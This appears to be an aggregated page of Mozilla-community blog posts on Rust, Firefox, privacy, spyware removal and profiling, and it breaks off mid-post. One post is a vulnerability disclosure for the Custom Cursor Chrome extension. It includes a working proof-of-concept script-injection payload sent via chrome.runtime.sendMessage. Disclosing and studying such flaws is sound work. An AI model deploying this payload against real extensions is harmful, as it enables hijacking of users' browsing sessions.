Thanks to Daniel H-M and Erik Zivkovic for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Wladimir PalantBreaking Custom Cursor to p0wn the web

Browser extensions make attractive attack targets. That’s not necessarily because of the data handled by the extension itself, but too often because of the privileges granted to the extension. Particularly extensions with access to all websites should better be careful and reduce the attack surface as much as possible. Today’s case study is Custom Cursor, a Chrome extension that more than 6 million users granted essentially full access to their browsing session.

A red mouse cursor with evil eyes grinning with its sharp teeth, next to it the text Custom Cursor<figcaption> Image credits: Custom Cursor, palomaironique </figcaption>

The attack surface of Custom Cursor is unnecessarily large: it grants custom-cursor.com website excessive privileges while also disabling default Content Security Policy protection. The result: anybody controlling custom-cursor.com (e.g. via one of the very common cross-site scripting vulnerabilities) could take over the extension completely. As of Custom Cursor 3.0.1 this particular vulnerability has been resolved, the attack surface remains excessive however. I recommend uninstalling the extension, it isn’t worth the risk.

Integration with extension’s website

The Custom Cursor extension will let you view cursor collections on custom-cursor.com website, installing them in the extension works with one click. The seamless integration is possible thanks to the following lines in extension’s manifest.json file:

"externally_connectable": {
  "matches": [ "*://*.custom-cursor.com/*" ]
},

This means that any webpage under the custom-cursor.com domain is allowed to call chrome.runtime.sendMessage() to send a message to this extension. The message handling in the extension looks as follows:

browser.runtime.onMessageExternal.addListener(function (request, sender, sendResponse) {
  switch (request.action) {
    case "getInstalled": {
      ...
    }
    case "install_collection": {
      ...
    }
    case "get_config": {
      ...
    }
    case "set_config": {
      ...
    }
    case "set_config_sync": {
      ...
    }
    case "get_config_sync": {
      ...
    }
  }
}.bind(this));

This doesn’t merely allow the website to retrieve information about the installed icon collections and install new ones, it also provides the website with arbitrary access to extension’s configuration. This in itself already has some abuse potential, e.g. it allows tracking users more reliably than with cookies as extension configuration will survive clearing browsing data.

The vulnerability

Originally I looked at Custom Cursor 2.1.10. This extension version used jQuery for its user interface. As noted before, jQuery encourages sloppy security practices, and Custom Cursor wasn’t an exception. For example, it would create HTML elements by giving jQuery HTML code:

collection = $(
  `<div class="box-setting" data-collname="${collname}">
    <h3>${item.name}</h3>
    <div class="collection-cursors" data-collname="${collname}">
    </div>
  </div>`
);

With collname being unsanitized collection name here, this code allows HTML injection. A vulnerability like that is normally less severe for browser extensions, thanks to their default Content Security Policy. Except that Custom Cursor doesn’t use the default policy but instead:

"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",

This 'unsafe-eval' allows calling inherently dangerous JavaScript functions like eval(). And what calls eval() implicitly? Why, jQuery of course, when processing a <script> tag in the HTML code. A malicious collection name like Test<script>alert(1)</script> will display the expected alert message when the list of collections is displayed by the extension.

So by installing a collection with a malicious name the custom-cursor.com website could run JavaScript code in the extension. But does that code also have access to all of extension’s privileges? Yes as the following code snippet proves:

chrome.runtime.sendMessage("ogdlpmhglpejoiomcodnpjnfgcpmgale", {
  action: "install_collection",
  slug: "test",
  collection: {
    id: 1,
    items: [],
    slug: "test",
    name: `Test
      <script>
        chrome.runtime.getBackgroundPage(page => page.console.log(1));
      </script>`
  }
})

When executed on any webpage under the custom-cursor.com domain this will install an empty icon collection. The JavaScript code in the collection name will retrieve the extension’s background page and output some text to its console. It could have instead called page.eval() to run additional code in the context of the background page where it would persist for the entire browsing session. And it would have access to all of extension’s privileges:

"permissions": [ "tabs", "*://*/*", "storage" ],

This extension has full access to all websites. So malicious code could spy on everything the user does, and it could even load more websites in the background in order to impersonate the user towards the websites. If the user is logged into Amazon for example, it could place an order and have it delivered to a new address. Or it could send spam via the user’s Gmail account.

What’s fixed and what isn’t

When I reported this vulnerability I gave five recommendations to reduce the attack surface. Out of these, one has been implemented: jQuery has been replaced by React, a framework not inherently prone to cross-site scripting vulnerabilities. So the immediate code execution vulnerability has been resolved.

Otherwise nothing changed however and the attack surface remains considerable. The following recommendations have not been implemented:

  1. Use the default Content Security Policy or at least remove 'unsafe-eval'.
  2. Restrict special privileges for custom-cursor.com to HTTPS and specific subdomains only. As custom-cursor.com isn’t even protected by HSTS, any person-in-the-middle attacker could force the website to load via unencrypted HTTP and inject malicious code into it.
  3. Protect custom-cursor.com website via Content Security Policy which would make exploitable cross-site scripting vulnerabilities far less likely.
  4. Restrict the privileges granted to the website, in particular removing arbitrary access to configuration options.

The first two changes in particular would have been trivial to implement, especially when compared to the effort of moving from jQuery to React. Why this has not been done is beyond me.

Timeline

  • 2021-06-30: Sent a vulnerability report to various email addresses associated with the extension
  • 2021-07-05: Requested confirmation that the report has been received
  • 2021-07-07: Received confirmation that the issue is being worked on
  • 2021-09-28: Published article (90 days deadline)

The Talospace ProjectDAWR YOLO even with DD2.3

Way back in Linux 5.2 was a "YOLO" mode for the DAWR register required for debugging with hardware watchpoints. This register functions properly on POWER8 but has an erratum on pre-DD2.3 POWER9 steppings (what Raptor sells as "v1") where the CPU will checkstop — invariably bringing the operating system to a screeching halt — if a watchpoint is set on cache-inhibited memory like device I/O. This is rare but catastrophic enough that the option to enable DAWR anyway is hidden behind a debugfs switch.

Now that I'm stressing out gdb a lot more working on the Firefox JIT, it turns out that even if you do upgrade your CPUs to DD2.3 (as I did for my dual-8 Talos II system, or what Raptor sells as "v2"), you don't automatically get access to the DAWR even on a fixed POWER9 (Fedora 34). Although you'll no longer be YOLOing it on such a system, still remember to echo Y > /sys/kernel/debug/powerpc/dawr_enable_dangerous as root and restart your debugger to pick up hardware watchpoint support.

Incidentally, I'm about two-thirds of the way through the wasm test cases. The MVP is little-endian POWER9 Baseline Interpreter and Wasm support, so we're getting closer and closer. You can help.

Karl DubostWhen iOS will allow other browsers

User agent sniffing is doomed to fail. It has this thick layer of opacity and logic, where you are never sure that you will really get in the end.

Stuffed animal through the opaque glass of a window.

This happens all the time and will happen again. It's often not only technical, but business related and just human. But let's focus on the detection of Firefox on iOS. Currently, on iOS, every browsers are using the same rendering engine. The one which is mandated by Apple. Be Chrome, Firefox, etc, they all use WKWebView.

One of the patterns of user agent detections goes like this:

  1. Which browsers? Firefox, Chrome, Safari, etc.
  2. Which device type? Mobile, Desktop, Tablet
  3. Which browser version?

You have 30s to guess what is missing in this scenario?

Yes, the OS. Is it iOS or Android? The current logic for some developers is that

  • Safari + mobile = iOS
  • Firefox + mobile = Android

As of today, Firefox

  • on iOS is version 37
  • on Android is version 94

So if the site has minimum version support grid

function l() {
  var t = window.navigator.userAgent,
    e = {
      action: "none",
    },
    n = c.warn,
    o = c.block;
  Object.keys(s).forEach(function (n) {
    t.match(n) && (e = c[s[n]]);
  });
  var r = a.detect(t);
  return (r.msie && r.version <= 11) ||
    (r.safari && r.version <= 8) ||
    (r.firefox && r.version <= 49)
    ? o
    : (r.chrome && r.version <= 21) ||
      (r.firefox && r.version <= 26 && !r.mobile && !r.tablet) ||
      (r.safari && r.version <= 4 && r.mobile) ||
      (r.safari && r.version <= 6) ||
      (r.android && r.version <= 4)
    ? n
    : e;
}

Here the site sees Firefox… so it must be Android, so it must be Gecko. They have set their minimum support for version 49. Firefox is then considered outdated. Safari minimum version on their grid is 8. So Firefox iOS (WebKitView) would have no issues!

Fast Forward To The Future.

When Apple authorizes different rendering engines on iOS (yes, I'm on the optimistic side, because I'm patient), I already foresee a huge webcompat issue. The web developers (who are currently right) will infer in some ways that Firefox on iOS can only be WebKitWebView. So the day Gecko is authorized on iOS, we can expect more breakages and ironically some of the webcompat bugs, we currently have will go away.

The Rust Programming Language BlogCore team membership updates

The Rust Core team is excited to announce the first of a series of changes to its structure we’ve been planning for 2021, starting today by adding several new members.

Originally, the Core team was composed of the leads from each Rust team. However, as Rust has grown, this has long stopped being true; most members of the Core team are not team leads in the project. In part, this is because Core’s duties have evolved significantly away from the original technical focus. Today, we see the Core team’s purpose as enabling, amplifying, and supporting the excellent work of every Rust team. Notably, this included setting up and launching the Rust Foundation.

We know that our maintainers, and especially team leads, dedicate an enormous amount of time to their work on Rust. We care deeply that it’s possible for not just people working full time on Rust to be leaders, but that part time volunteers can as well. To enable this, we wish to avoid coupling leading a team with a commitment to stewarding the project as a whole as part of the Core team. Likewise, it is important that members of the Core team have the option to dedicate their time to just the Core team’s activities and serve the project in that capacity only.

Early in the Rust project, composition of the Core team was made up of almost entirely Mozilla employees working full time on Rust. Because this team was made up of team leads, it follows that team leads were also overwhelmingly composed of Mozilla employees. As Rust has grown, folks previously employed at Mozilla left for new jobs and new folks appeared. Many of the new folks were not employed to work on Rust full time so the collective time investment was decreased and the shape of the core team’s work schedule shifted from 9-5 to a more volunteer cadence. Currently, the Core team is composed largely of volunteers, and no member of the Core team is employed full time to work on their Core team duties.

We know that it’s critical to driving this work successfully to have stakeholders on the team who are actively working in all areas of the project to help prioritize the Core team’s initiatives. To serve this goal, we are announcing some changes to the Core team’s membership today: Ryan Levick, Jan-Erik Rediger, and JT are joining the Core team. To give some context on their backgrounds and experiences, each new member has written up a brief introduction.

  • Ryan Levick began exploring Rust in 2014 always looking for more and more ways to be involved in the community. Over time he participated more by co-organizing the Berlin Rust meetup, doing YouTube tutorials, helping with various project efforts, and more. In 2019, Ryan got the opportunity to work with Rust full time leading developer advocacy for Rust at Microsoft and helping build up the case for Rust as an official language inside of Microsoft. Nowadays he’s an active Rust project member with some of the highlights including working in the compiler perf team, running the Rust annual survey, and helping the 2021 edition effort.
  • Jan-Erik Rediger started working with Rust sometime in late 2014 and has been a member of the Rust Community Team since 2016. That same year he co-founded RustFest, one of the first conferences dedicated to Rust. In the following years seven RustFest conferences have brought together hundreds of Rust community members all around Europe and more recently online.
  • JT has 15 years of programming language experience. During that time, JT worked at Cray on the Chapel programming language and at Apple on LLVM/Clang. In 2012, they joined Microsoft as part of the TypeScript core team, where they helped to finish and release TypeScript to the world. They stayed on for over three years, helping direct TypeScript and grow its community. From there, they joined Mozilla to work on Rust, where they brought their experience with TypeScript to help the Rust project transition from a research language to an industrial language. During this time, they co-created the new Rust compiler error message format and the Rust Language Server. Their most recent work is with Nushell, a programming language implemented in Rust.

These new additions will add fresh perspectives along several axes, including geographic and employment diversity. However, we recognize there are aspects of diversity we can continue to improve. We see this work as critical to the ongoing health of the Rust project and is part of the work that will be coordinated between the Rust core team and the Rust Foundation.

Manish Goregaokar is also leaving the team to be able to focus better on the dev-tools team. Combining team leadership with Core team duties is a heavy burden. While Manish has enjoyed his time working on project-wide initiatives, this coupling isn’t quite fair to the needs of the devtools team, and he’s glad to be able to spend more time on the devtools team moving forward.

The Core team has been doing a lot of work in figuring out how to improve how we work and how we interface with the rest of the project. We’re excited to be able to share more on this in future updates.

We're super excited for Manish’s renewed efforts on the dev tools team and for JT, Ryan, and Jan-Erik to get started on core team work! Congrats and good luck!

This post is part 1 of a multi-part series on updates to the Rust core team.

Cameron KaiserQuestionable RCE with .webloc/.inetloc files

A report surfaced recently that at least some recent versions of macOS can be exploited to run arbitrary local applications using .inetloc files, which may allow a drive-by download to automatically kick off a vulnerable application and exploit it. Apple appeared to acknowledge the fault, but did not assign it a CVE; the reporter seems not to have found the putative fix satisfactory and public disclosure thus occurred two days ago.

The report claims the proof of concept works on all prior versions of macOS, but it doesn't seem to work (even with corrected path) on Tiger. Unfortunately due to packing I don't have a Leopard or Snow Leopard system running right now, so I can't test those, but the 10.4 Finder (which would launch these files) correctly complains they are malformed. As a safety measure in case there is something exploitable, the October SPR build of TenFourFox will treat both .webloc and .inetloc files that you might download as executable. (These files use similar pathways, so if one is exploitable after all, then the other probably is too.) I can't think of anyone who would depend on the prior behaviour, but in our unique userbase I'm sure someone does, so I'm publicizing this now ahead of the October 5 release. Meanwhile, if someone's able to make the exploit work on a Power Mac, I'd be interested to hear how you did it.

The Mozilla BlogLocation history: How your location is tracked and how you can limit sharing it

In real estate, the age old mantra is “location, location, location,” meaning that location drives value. That’s true even when it comes to data collection in the online world, too — your location history is valuable, authentic information. In all likelihood, you’re leaving a breadcrumb trail of location data every day, but there are a few things you can do to clean that up and keep more of your goings-on to yourself. 

What is location history?

When your location is tracked and stored over time, it becomes a body of data called your location history. This is rich personal data that shows when you have been at specific locations, and can include things like frequency and duration of visits and stops along the way. Connecting all of that location history, companies can create a detailed picture and make inferences about who you are, where you live and work, your interests, habits, activities, and even some very private things you might not want to share at all.

How is location data used?

For some apps, location helps them function better, like navigating with a GPS or following a map. Location history can also be useful for retracing your steps to past places, like finding your way back to that tiny shop in Florence where you picked up beautiful stationery two years ago.

On the other hand, marketing companies use location data for marketing and advertising purposes. They can also use location to conduct “geomarketing,” which is targeting you with promotions based on where you are. Near a certain restaurant while you’re out doing errands at midday? You might see an ad for it on your phone just as you’re thinking about lunch.

Location can also be used to grant or deny access to certain content. In some parts of the world, content on the internet is “geo-blocked” or geographically-restricted based on your IP address, which is kind of like a mailing address, associated with your online activity. Geo-blocking can happen due to things like copyright restrictions, limited licensing rights or even government control. 

Who can view your location data?

Any app that you grant permission to see your location has access to it. Unless you carefully read each data policy or privacy policy, you won’t know how your location data — or any personal data — collected by your apps is used. 

Websites can also detect your general location through your IP address or by asking directly what your location is, and some sites will take it a step further by requesting more specifics like your zip code to show you different site content or search results based on your locale.

How to disable location request prompts

Tired of websites asking for your location? Here’s how to disable those requests:

Firefox: Type “about:preferences#privacy” in the URL bar. Go to Permissions > Location > Settings. Select “Block new requests asking to access your location”. Get more details about location sharing in Firefox.

Safari: Go to Settings > Websites > Location. Select “When visiting other websites: Deny.”

Chrome: Go to Settings > Privacy and security > Site Settings. Then click on Location and select “Don’t allow sites to see your location”

Edge: Go to Settings and more > Settings > Site permissions > Location. Select “Ask before accessing”

Limit, protect and delete your location data

Most devices have the option to turn location tracking off for the entire device or for select apps. Here’s how to view and change your location privacy settings:

How to delete your Google Location History
Ready to delete your Google Location History in one fell swoop? There’s a button for that.

It’s also a good idea to review all of the apps on your devices. Check to see if you’re sharing your location with some that don’t need it all or even all the time. Some of them might be set up just to get your location, and give you little benefit in return while sharing it with a network of third parties. Consider deleting apps that you don’t use or whose service you could just as easily get through a mobile browser where you might have better location protection.

Blur your device’s location for next-level privacy

Learn more about Mozilla VPN

The post Location history: How your location is tracked and how you can limit sharing it appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 100

Highlights

    • Firefox 92 was released today!
    • We’re 96% through M1 for Fluent migration! Great work from kpatenio and niklas!
      • [Screenshot]
        • Caption: A graph showing how Fluent strings have overtaken DTD strings over time as the dominant string mechanism in browser.xhtml. As of September 2nd, it shows that there are 732 Fluent strings and 32 DTD strings in browser.xhtml
      • Fluent is our new localization framework
    • We have improvements coming soon for our downloads panel! You can opt in by enabling browser.download.improvements_to_download_panel in about:config.
  • Nightly now has an about:unloads page to show some of the locally collected heuristics being used to decide which tabs to unload on memory pressure. You can also manually unload tabs from here.
    • As part of Fission-related changes, we’ve rearchitected some of the internals of the WebExtensions framework – see Bug 1708243
  • If you notice recent addons-related regressions in Nightly 94 and Beta 93 (e.g. like Bug 1729395, affecting the multi-account-containers addon), please file a bug and needinfo us (rpl or zombie).

Friends of the Firefox team

For contributions from August 25th to September 7th 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

  • Ava Katushka
  • Itiel
  • Michael Kohler [:mkohler]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • :gregtatum landed in Firefox 93 a follow up to Bug 1722087 to migrate users away from the old recommended themes that have been removed from the omni.jar – Bug 1723602.
WebExtension APIs
  • extension.getViews now returns existing sidebar extension pages also when called with a `windowId` filter – Bug 1612390 (closed by one of the changes landed as part of Bug 1708243)

Downloads Panel

Fluent

Form Autofill

  • Bug 1687684 – Fix credit card autofill when the site prefills fields
  • Bug 1688209 – Prevent simple hidden fields from being eligible for autofill.

High-Contrast Mode (MSU Capstone project)

  • Molly and Micah have kicked off another semester working with MSU capstone students. They’ll be helping us make a number of improvements to high-contrast mode on Firefox Desktop. See this meta bug to follow along.
  • We’ll be doing a hack weekend on September 11 & 12 where students will get ramped up on their first bugs and tools needed to do Firefox development.

Lint, Docs and Workflow

Password Manager

  • Welcome Serg Galich, he’ll be working on credential management with Tim and Dimi.

Search and Navigation

  • Drew landed some early UI changes, part of Firefox Suggest, in Nightly. In particular, labels have been added to Address Bar groups. A goal of Firefox Suggest is to provide smarter and more useful results, and better grouping, while also improving our understanding of how the address bar results are perceived. More experiments are still ongoing and planned for the short future.
  • Daisuke landed a performance improvement to the address bar tokenizer. Bug 1726837

Mike TaylorTesting Chrome version 100 for fun and profit (but mostly fun I guess)

Great news readers, my self-imposed 6 month cooldown on writing amazing blog posts has expired.

My pal Ali just added a flag to Chromium to allow you to test sites while sending a User-Agent string that claims to be version 100 (should be in version 96+, that’s in the latest Canary if you download or update today):

screenshot of chrome://flags/#force-major-version-to-100

I’ll be lazy and let Karl Dubost do the explaining of the why, in his post “Get Ready For Three Digits User Agent Strings”.

So turn it on and report all kinds of bugs, either at crbug.com/new or webcompat.com/issues/new.

Firefox Add-on ReviewsYouTube your way—browser extensions put you in charge of your video experience

YouTube wants you to experience YouTube in very prescribed ways. But with the right browser extension, you’re free to alter YouTube to taste. Change the way the site looks, behaves, and delivers your favorite videos. 

Enhancer for YouTube

With dozens of customization features, Enhancer for YouTube has the power to dramatically reorient the way you watch videos. 

While a bunch of customization options may seem overwhelming, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

<figcaption>Enhancer for YouTube offers easy access controls just beneath the video player.</figcaption>

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration

YouTube High Definition

Though its primary function is to automatically play all YouTube videos in their highest possible resolution, YouTube High Definition has a few other fine features to offer. 

In addition to automatic HD, YouTube High Definition can…

  • Customize video player size
  • HD support for clips embedded on external sites
  • Specify your ideal resolution (4k – 144p)
  • Set a preferred volume level 
  • Also automatically plays the highest quality audio

YouTube NonStop

So simple. So awesome. YouTube NonStop remedies the headache of interrupting your music with that awful “Video paused. Continue watching?” message. 

Works on YouTube and YouTube Music. You’re now free to navigate away from your YouTube tab for as long as you like and not fret that the rock will stop rolling. 

YouTube Audio

Another simple but great extension for music fans, YouTube Audio disables the video broadcast and just streams audio to save you a ton of bandwidth. 

This is an essential extension if you have limited internet bandwidth and only want the music anyway. Click YouTube Audio’s toolbar button to mute the video stream anytime you like. Also helps preserve battery life. 

PocketTube

If you subscribe to a lot of YouTube channels PocketTube is a fantastic way to organize all your subscriptions by themed collections. 

Group your channel collections by subject, like “Sports,” “Cooking,” “Cat videos” or whatever. Other key features include…

  • Add custom icons to easily identify your channel collections
  • Customize your feed so you just see videos you haven’t watched yet, prioritize videos from certain channels, plus other content settings
  • Integrates seamlessly with YouTube homepage 
  • Sync collections across Firefox/Android/iOS using Google Drive and Chrome Profiler
<figcaption>PocketTube keeps your channel collections neatly tucked away to the side. </figcaption>

AdBlocker for YouTube

It’s not just you who’s noticed a lot more ads lately. Regain control with AdBlocker for YouTube

The extension very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster, more focused YouTube. 

SponsorBlock

It’s a terrible experience when you’re enjoying a video or music on YouTube and you’re suddenly interrupted by a blaring ad. SponsorBlock solves this problem in a highly effective and original way. 

Leveraging the power of crowd sourced information to locate where—precisely— interruptive sponsored segments appear in videos, SponsorBlock learns where to automatically skip sponsored segments with its ever growing database of videos. You can also participate in the project by reporting sponsored segments whenever you encounter them (it’s easy to report right there on the video page with the extension). 

SponsorBlock can also learn to skip non-music portions of music videos and intros/outros, as well. If you’d like a deeper dive of SponsorBlock we profiled its developer and open source project on Mozilla Distilled

We hope one of these extensions enhances the way you enjoy YouTube. Feel free to explore more great media extensions on addons.mozilla.org

 

The Mozilla BlogDid you hear about Apple’s security vulnerability? Here’s how to find and remove spyware.

Spyware has been in the news recently with stories like the Apple security vulnerability that allowed devices to be infected without the owner knowing it, and a former editor of The New York Observer being charged with a felony for unlawfully spying on his spouse with spyware. Spyware is a sub-category of malware that’s aimed at surveilling the behavior of human target(s) using a given device where the spyware is running. This surveillance could include but is not limited to logging keystrokes, capturing what websites you are visiting, looking at your locally stored files/passwords, and capturing audio or video within proximity to the device.

How does spyware work?

Spyware, much like any other malware, doesn’t just appear on a device. It often needs to first be installed or initiated. Depending on what type of device, this could manifest in a variety of ways, but here are a few specific examples:

  • You could visit a website with your web browser and a pop-up prompts you to install a browser extension or addon.
  • You could visit a website and be asked to download and install some software you weren’t there to get.
  • You could visit a website that prompts you to access your camera or audio devices, even though the website doesn’t legitimately have that need.
  • You could leave your laptop unlocked and unattended in a public place, and someone could install spyware on your computer.
  • You could share a computer or your password with someone, and they secretly install the spyware on your computer.
  • You could be prompted to install a new and unknown app on your phone.
  • You install pirated software on your computer, but this software additionally contains spyware functionality.

With all the above examples, the bottom line is that there could be software running with a surveillance intent on your device. Once installed, it’s often difficult for a lay person to have 100% confidence that their device can be trusted again, but for many the hard part is first detecting that surveillance software is running on your device.

How to detect spyware on your computer and phone

As mentioned above, spyware, like any malware, can be elusive and hard to spot, especially for a layperson. However, there are some ways by which you might be able to detect spyware on your computer or phone that aren’t overly complicated to check for.

Cameras

On many types of video camera devices, you get a visual indication that the video camera is recording. These are often a hardware controlled light of some kind that indicates the device is active. If you are not actively using your camera and these camera indicator lights are on, this could be a signal that you have software on your device that is actively recording you, and it could be some form of spyware. 

Here’s an example of what camera indicator lights look like on some Apple devices, but active camera indicators come in all kinds of colors and formats, so be sure to understand how your device works. A good way to test is to turn on your camera and find out exactly where these indicator lights are on your devices.

Additionally, you could make use of a webcam cover. These are small mechanical devices that allow users to manually open and shut cameras only when in use. These are generally a very cheap and low-tech way to protect snooping via cameras.

Applications

One pretty basic means to detect malicious spyware on systems is simply reviewing installed applications, and only keeping applications you actively use installed.

On Apple devices, you can review your applications folder and the app store to see what applications are installed. If you notice something is installed that you don’t recognize, you can attempt to uninstall it. For Windows computers, you’ll want to check the Apps folder in your Settings

Web extensions

Many browsers, like Firefox or Chrome, have extensive web extension ecosystems that allow users to customize their browsing experience. However, it’s not uncommon for malware authors to utilize web extensions as a medium to conduct surveillance activities of a user’s browsing activity.

On Firefox, you can visit about:addons and view all your installed web extensions. On Chrome, you can visit chrome://extensions and view all your installed web extensions. You are basically looking for any web extensions that you didn’t actively install on your own. If you don’t recognize a given extension, you can attempt to uninstall it or disable it.

Add features to Firefox to make browsing faster, safer or just plain fun.

Get quality extensions, recommended by Firefox.

How do you remove spyware from your device?

If you recall an odd link, attachment, download or website you interacted with around the time you started noticing issues, that could be a great place to start when trying to clean your system. There are various free online tools you can leverage to help get a signal on what caused the issues you are experiencing. VirusTotal, UrlVoid and HybridAnalysis are just a few examples. These tools can help you determine when the compromise of your system occurred. How they can do this varies, but the general idea is that you give it the file or url you are suspicious of, and it will return a report to you showing what various computer security companies know about the file or url. A point of infection combined with your browser’s search history would give you a starting point of various accounts you will need to double check for signs of fraudulent or malicious activity after you have cleaned your system. This isn’t entirely necessary in order to clean your system, but it helps jumpstart your recovery from a compromise.

There are a couple of paths that can be followed in order to make sure any spyware is entirely removed from your system and give you peace of mind:

Install an antivirus (AV) software from a well-known company and run scans on your system

  • If you have a Windows device, Windows Defender comes pre-installed, and you should double-check that you have it turned on.
  • If you currently have an AV software installed, make sure it’s turned on and that it’s up to date. Should it fail to identify and remove the spyware from your system, then it’s on to one of the following options.

Run a fresh install of your system’s operating system

  • While it might be tempting to backup files you have on your system, be careful and remember that your device was compromised and the file causing the issue could end up back on your system and again compromising it.
  • The best way to do this would be to wipe the hard drive of your system entirely, and then reinstall from an external device.

How can you protect yourself from getting spyware?

There are a lot of ways to help keep your devices safe from spyware, and in the end it can all be boiled down to employing a little healthy skepticism and practicing good basic digital hygiene. These tips will help you stay on the right track:

Be wary. Don’t click on links, open/download attachments from unknown senders. This applies to both messaging apps as well as emails. 

Stay updated. Take the time to install updates/patches. This helps make sure your devices and apps are protected against known issues.

Check legitimacy. If you aren’t sure if a website or email is giving legitimate information, take the time to use your favorite search engine to find the legitimate website. This helps avoid issues with typos potentially leading you to a bad website

Use strong passwords. Ensure all your devices have solid passwords that are not shared. It’s easier to break into a house that isn’t locked.

Delete extras. Remove applications you don’t use anymore. This reduces the total attack surface you are exposing, and has the added bonus of saving space for things you care about.

Use security settings. Enable built in browser security features. By default, Firefox is on the lookout for malware and will alert you to Deceptive Content and Dangerous Software.

The post Did you hear about Apple’s security vulnerability? Here’s how to find and remove spyware. appeared first on The Mozilla Blog.

Marco Castellucciobugbug infrastructure: continuous integration, multi-stage deployments, training and production services

bugbug started as a project to automatically assign a type to bugs (defect vs enhancement vs task, back when we introduced the “type” we needed a way to fill it for already existing bugs), and then evolved to be a platform to build ML models on bug reports: we now have many models, some of which are being used on Bugzilla, e.g. to assign a type, to assign a component, to close bugs detected as spam, to detect “regression” bugs, and so on.

Then, it evolved to be a platform to build ML models for generic software engineering purposes: we now no longer only have models that operate on bug reports, but also on test data, patches/commits (e.g. to choose which tests to run for a given patch and to evaluate the regression riskiness associated to a patch), and so on.

Its infrastructure also evolved over time and slowly became more complex. This post attempts to clarify its overall infrastructure, composed of multiple pipelines and multi-stage deployments.

The nice aspect of the continuous integration, deployment and production services of bugbug is that almost all of them are running completely on Taskcluster, with a common language to define tasks, resources, and so on.

In bugbug’s case, I consider a release as a code artifact (source code at a given tag in our repo) plus the ML models that were trained with that code artifact and the data that was used to train them. This is because the results of a given model are influenced by all these aspects, not just the code as in other kinds of software. Thus, in the remainder of this post, I will refer to “code artifact” or “code release” when talking about a new version of the source code, and to “release” when talking about a set of artifacts that were built with a specific snapshot (version) of the source code and with a specific snapshot of the data.

The overall infrastructure can be seen in this flowchart, where the nodes represent artifacts and the subgraphs represent the set of operations performed on them. The following sections of the blog post will then describe the components of the flowchart in more detail. Flowchart of the bugbug infrastructure

Continuous Integration and First Stage (Training Pipeline) Deployment

Every pull request and push to the repository triggers a pipeline of Taskcluster tasks to:

  • run tests for the library and its linked HTTP service;
  • run static analysis and linting;
  • build Python packages;
  • build the frontend;
  • build Docker images.

Code releases are represented by tags. A push of a tag triggers additional tasks that perform:

  • integration tests;
  • push of Docker images to DockerHub;
  • release of a new version of the Python package on PyPI;
  • update of the training pipeline definition.

After a code release, the training pipeline which performs ML training is updated, but the HTTP service, the frontend and all the production pipelines that depend on the trained ML models (the actual release) are still on the previous version of the code (since they can’t be updated until the new models are trained).

Continuous Training and Second Stage (ML Model Services) Deployment

The training pipeline runs on Taskcluster as a hook that is either triggered manually or on a cron.

The training pipeline consists of many tasks that:

  • retrieve data from multiple sources (version control system, bug tracking systems, Firefox CI, etc.);
  • generation of intermediate artifacts that are used by later stages of the pipeline or by other pipelines or other services;
  • training of ML models using the above (there are also training tasks that depend on other models to be trained and run first to generate intermediate artifacts);
  • check training metrics to ensure there are no short term or long term regressions;
  • run integration tests with the trained models;
  • build Docker images with the trained models;
  • push Docker images with the trained models;
  • update the production pipelines definition.

After a run of the training pipeline, the HTTP service and all the production pipelines are updated to the latest version of the code (if they weren’t already) and to the last version of the trained models.

Production pipelines

There are multiple production pipelines (here’s an example), that serve different objectives, all running on Taskcluster and triggered either on cron or by pulse messages from other services.

Frontend

The bugbug UI lives at https://changes.moz.tools/, and it is simply a static frontend built in one of the production pipelines defined in Taskcluster.

The production pipeline performs a build and uploads the artifact to S3 via Taskcluster, which is then exposed at the URL mentioned earlier.

HTTP Service

The HTTP service is the only piece of the infrastructure that is not running on Taskcluster, but currently on Heroku.

The Docker images for the service are built as part of the training pipeline in Taskcluster, the trained ML models are included in the Docker images themselves. This way, it is possible to rollback to an earlier version of the code and models, should a new one present a regression.

There is one web worker that answers to requests from users, and multiple background workers that perform ML model evaluations. These must be done in the background because of performance reasons (the web worker must answer quickly). The ML evaluations themselves are quick, and so could be directly done in the web worker, but the input data preparation can be slow as it requires interaction with external services such as Bugzilla or a remote Mercurial server.

Paul BoneRunning the AWSY benchmark in the Firefox profiler

The are we slim yet (AWSY) benchmark measures memory usage. Recently when I made a simple change to firefox and expected it might save a bit of memory, it actually increased memory usage on the AWSY benchmark.

We have lots of tools to hunt down memory usage problems. But to see an almost "log" of when garbage collection and cycle collection occurs, the Firefox profiler is amazing.

I wanted to profile the AWSY benchmark to try and understand what was happening with GC scheduling. But it didn’t work out-of-the-box. This is one of those blog posts that I’m writing down so next time this happens, to me or anyone else, although I am selfish. And I websearch for "AWSY and Firefox Profiler" I want this to be the number 1 result and help me (or someone else) out.

The normal instructions

First you need a build with profiling enabled. Put this in your mozconfig

ac_add_options --enable-debug
ac_add_options --enable-debug-symbols
ac_add_options --enable-optimize
ac_add_options --enable-profiling

The instructions to get the profiler to run came from Ted Campbell. Thanks Ted.

Ted’s instructions disabled stack sampling, we didn’t care about that since the data we need comes from profile markers. I can also run a reduced awsy test because 10 entries is enough to create the problem.

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES="nostacksampling"
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

But it crashes due to Bug 1710408.

So I can’t use nostacksampling, which would have been nice to save some memory/disk space, never mind.

So I removed that option, then I get profiles that are too short. The profiler records into a circular buffer so if that buffer is too small it’ll discard the earlier information. In this case I want the earlier information because I think something at the beginning is the problem. So I need to add this to get a bigger buffer. The default is 4 million entries (32MB).

export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))

But now the profiles are too big and Firefox shutdown times out (over 70 seconds) so the marionette test driver kills Firefox before it can write out the profile.

The solution

